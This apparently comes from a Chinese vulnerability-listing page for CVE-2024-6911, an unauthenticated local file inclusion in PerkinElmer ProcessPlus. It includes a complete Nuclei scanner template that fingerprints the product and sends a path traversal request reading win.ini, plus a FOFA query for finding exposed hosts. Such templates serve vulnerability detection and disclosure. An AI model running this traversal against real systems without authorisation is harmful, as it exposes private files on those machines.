CVE-2024-6911: PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: PerkinElmer ProcessPlus | POC: 已公开

漏洞描述

Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus through 1.11.6507.0.

PoC代码[已公开]

id: CVE-2024-6911

info:
  name: PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
  author: s4e-io
  severity: high
  description: |
    Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus through 1.11.6507.0.
  reference:
    - http://seclists.org/fulldisclosure/2024/Jul/13
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6911
    - https://github.com/adminlove520/pocWiki
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
    cvss-score: 8.7
    cve-id: CVE-2024-6911
    cwe-id: CWE-552
    epss-score: 0.93588
    epss-percentile: 0.99831
    cpe: cpe:2.3:a:perkinelmer:processplus:1.11.6507:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: perkinelmer
    product: processplus
    fofa-query: '"Process Plus" && icon_hash="1772087922"'
  tags: cve,cve2024,processplus,intrusive,lfi,seclists

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /ProcessPlus HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"<title>Process Plus - Perten Instruments</title>")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022022b5920d85c5d4a0395b1ff6449db0bf00cd264a3848c64502c429104ddfaecb02206e356b3d850fd9e815eeba010cdd2170bd4bf922c59ac15fd777b5e44c6ea809:922c64590222798bb761d5b6d8e72950

相关漏洞推荐